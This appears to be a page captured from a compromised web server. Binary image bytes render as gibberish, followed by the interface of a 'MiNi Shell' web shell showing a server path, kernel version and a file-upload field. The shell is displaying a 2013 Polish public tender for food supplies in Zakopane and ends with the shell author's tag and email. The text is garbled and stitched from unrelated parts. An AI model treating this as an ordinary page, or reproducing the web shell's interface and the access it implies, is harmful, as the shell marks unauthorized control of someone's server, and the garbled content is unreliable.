JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/357344-N-2013.html

<p class="kh_header"><b>Zakopane: Dostawy Różne produkty spożywcze.</b><br>
<b>Numer ogłoszenia: 357344 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkoleniowo-Wypoczynkowy BALTICA , ul. Ogrodowa 6, 34-500 Zakopane, woj. małopolskie, tel. 18 2013431, faks 18 2013431 w. 813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane-oswbaltica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy Różne produkty spożywcze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Grupa I  Wyroby ciastkarskie, cukiernicze, kawa, herbata i podobne produkty
l.p.
Nazwa towaru
J.m
Ilość
Symbol
1
Baton Snickers waga  od 40g do 70g netto
szt
500
CPV 15842220-0
2
Baton Mars od waga 40g do 60g netto
szt
500
CPV-15842220-0
3
Prince polo waga od 30g do 50g netto
szt
300
CPV-15842220-0
4
Ciasteczka mieszanka od 1 kg do 2 kg
kg
100
CPV-15842300-5
5
Czekolada mleczna waga 100g netto
kg
20
CPV-15842100-3
6
Wafle Grześki  waga od 30g do 50g netto
szt
100
CPV-15842220-0
7
Delicje szampańskie  waga od 100g do 300g netto
kg
50
CPV-15812100-4
8
Herbata Lipton pakowana w kartoniki od 50szt do 100szt  w saszetkach z zawieszką waga 1 sztuki 0,002g netto 
kg
50
CPV-15864100-3
9
Herbata Eternal pakowana w kartoniki od 50szt do 100szt  w saszetkach z zawieszką waga 1 sztuki 0,002g netto
kg
50
CPV-15864100-3
10
HERBATA IRVING pakowana w kartoniki od od 50szt do 100szt w saszetkach z zawieszką waga sztuki 0,002g
kg
50
CPV-15864100-3
11
Kawa Nescafe Clasic rozpuszczalna waga od 100g do 300g netto
kg
150
CPV-15861300-4
12
Kawa Tchibo mielona waga  od 100g do 300g netto
kg
60
CPV-15861300-4
13
Kawa Prima mielona waga od 100g do  300g netto
kg
50
CPV-15863000-5

 Grupa II  Produkty z ciasta makaronowego.
l.p.
Nazwa towaru
J.m
Ilość
Symbol
1
Makaron łazanki typu lubella waga od 400g do 1000g netto
kg
50
CPV-15851110-2
2
Makaron tarte ciast typu lubella waga od 250g do 1000g netto
kg
50
CPV-15851110-2
3
Makaron świderki typu lubella waga od 400g do 1000g netto
kg
50
CPV-15851110-2
4
Makaron kolanka typu lubella waga od 400g do 1000g netto
kg
50
CPV-15851110-2
5
Makaron nitka typu lubella waga od 400g do 1000g. netto
kg
50
CPV-15851110-2
6
Makaron gwiazdki typu lubella waga  od 400g do 1000g netto
kg
50
CPV-15851110-2
7
Makaron muszelki duże typu  lubella waga od 400g do 1000g netto
kg
50
CPV-15851110-2
8
Makaron gruba rurka typu lubella waga od 400g do 1000g netto
kg
50
CPV-15851110-2
9
Makron wstążki typu lubella waga od 400g do 1000g netto
kg
50
CPV-15851110-2
10
Makaron Spaghetti typu lubella waga od 400g do 1000g netto
kg
50
CPV-15851190-6
11
Makaron Lasagne typu lubella waga od 400g do 1000g netto
kg
50
CPV-15851230-9
12
Groszek ptysiowy waga od 100g do 500g netto
kg
50
CPV-15820000-0
13
Cukier pakowany w torebkach papierowych 1 kg netto
kg
3000
CPV-15831200-4
14
Cukier puder  pakowany w torebkach papierowych 0,5 kg netto
kg
300
CPV-15830000-5
15
Cukier wanilinowy  waga od 20g do 50g netto
kg
30
CPV-15830000-5
16
Miód prawdziwy słoik waga  od 200g do 500g netto
kg
30
CPV-15831600-8
17
Miód sztuczny waga od 200g do 500g netto
kg
30
CPV-15831600-8
18
Kasza jęczmienna waga 1kg
kg
100
CPV-15613100-9
19
Kasza gryczana waga 1 kg
kg
100
CPV-15613100-9
20
Mąka ziemniaczana waga 1 kg
kg
100
CPV-15612200-3
21
Mąka pszenna poznańska waga 1 kg
kg
2000
CPV-15612100-2
22
Maka tortowa waga 1 kg
kg
300
CPV-15612200-3
23
Płatki kukurydziane od 0,5kg do 1 kg
kg
100
CPV-15613311-1
24
Płatki czekoladowe od 05kg do 1 kg
kg
100
CPV-15613311-1
25
Płatki miodowe od 0,5kg do 1 kg
kg
100
CPV-15613311-1
26
Ryż biały waga 1 kg
kg
400
CPV-15611000-4
27
Olej rośliny rzepakowy waga od 0,9 do 1 litra
kg
1000
CPV-15411100-3
28
Margaryna Palma Bielsko-Biała od 0,25kg do 0,5kg
L
70
CPV-15431100-9
29
Tłuszcz palmowy waga do 2,5kg
kg
300
CPV-15412200-1


   Grupa III  Mieszanki przypraw
l.p.
Nazwa towaru
J.m
Ilość
Symbol
1
Skórka pomarańczowa  w opakowaniu od 100g do 200g netto
kg
4
CPV-15842400-6
2
Budyń śmietankowy w opakowaniu od 30g do 50g netto
kg
30
CPV-15890000-3
3
Cynamon w opakowaniu od  10g do 30g netto
kg
5
CPV-15872200-3
4
Przyprawa do ryb typu  Knorr w opakowaniu od 20g do 1000g netto
kg
5
CPV-15871270-7
5
Ketchup  łagodny w opakowaniach z dozownikiem w opakowaniu od 250g do 500g netto
kg
200
CPV-15871230-5
6
Kisiel w opakowaniu  od 40g do 100g netto
kg
30
CPV-15890000-3
7
Kminek w opakowaniu od 10g do 100g netto
kg
10
CPV-15872300-4
8
Kwasek cytrynowy w opakowaniu  od 10g do 100g netto
kg
20
CPV-15890000-3
9
Liść laurowy w opakowaniu od 10g do 100g netto
kg
6
CPV-15872300-4
10
Majeranek w opakowaniu  od 15g do 100g netto
kg
6
CPV-15872300-4
11
Musztarda łagodna w opakowaniach z dozownikiem od 250g do 500g netto
kg
200
CPV-15871250-1
12
Ocet  spirytusowy  w butelkach od  0,5l do 1l netto
L
100
CPV-15871120-1
13
Ocet winny w butelkach  od 0,25l do 0,5l netto
L
30
CPV-15871120-1
14
Papryka słodka w opakowaniu  od 10g do 50g netto
kg
6
CPV-15872000-1
15
Papryka ostra w opakowaniu od 10g do 50g netto
kg
6
CPV-15872000-1
16
Majonez  typu kielecki przeznaczony do sałatek  w słoikach od 250g do 700g netto
kg
600
CPV-15872000-1
17
Pieprz w opakowaniu  od 10g do 50g netto
kg
20
CPV-15872100-2
18
Proszek do pieczenia w opakowaniu od 10g do 50g netto
kg
30
CPV-15899000-6
19
Przyprawa do kurczaka w opakowniu od 10g do 50g netto
kg
20
CPV-15871270-7
20
Przyprawa do zup typu maggi w opakowaniu szklanym 0,5l do 1 l netto
L
400
CPV-15890000-3
21
Rosół z kury typu Knorr kostki od 10g do 20g w opakowaniu od 6szt do 10szt netto 
kg
150
CPV-15891500-5
22
Przyprawa warzywna typu Vegeta w opakowaniu od 0,5kg do 1000g  netto
kg
150
CPV-15890000-3
23
Ziele angielskie w opakowaniu od  5 g do 30g netto
kg
6
CPV-15872300-4
24
Żelatyna spożywcza w opakowaniu od 10g do 100g netto
kg
20
CPV-15890000-3
25
Imbir w opakowaniu od 10g do 30g netto
kg
3
CPV-15872000-1
26
Żurek śląski  w opakowaniu od 40g do 50g netto 
kg
40
CPV-15891400-4
27
Oregano  w opakowaniu od 10gdo 30g netto
kg
2
CPV-15872300-4
28
Drożdże w kostkach  w opakowaniu od 100g do 500g netto
kg
20
CPV-15898000-9
29
Przyprawa do piernika  w opakowaniu od 10g do 50g netto
kg
3
CPV-15871000-4
30
Gałka muszkatołowa w opakowaniu od 10g do 50g netto
kg
1
CPV-15872000-1
31
Soda oczyszczona  w opakowaniu od 30g do 100g netto
kg
5
CPV-15890000-3
32
Przyprawa do grila  w opakowniu od 10g do 50g netto
kg
5
CPV-15871270-7
33
Kakao naturalne  w opakowaniu od  80g do 200g netto
kg
10
CPV-15841000-5
34
Sól w opakowaniu 1 kg netto
kg
400
CPV-15872400-5
35
Czosnek granulowany  w opakowaniu od 10g do 50g netto
kg
6
CPV-15811000-6.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis warunków do spełnienia w Specyfikacji Istotnych Warunków Zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis dokonywania oceny w Specyfikacji Istotnych Warunków Zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane-oswbaltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> info@zakopane-oswbaltica.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2013 godzina 10:00, miejsce: Ośrodek Szkoleniowo-Wypoczynkowy Baltica w Zakopanem, UL.Ogrodowa 6, sekretariat - pok.104..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com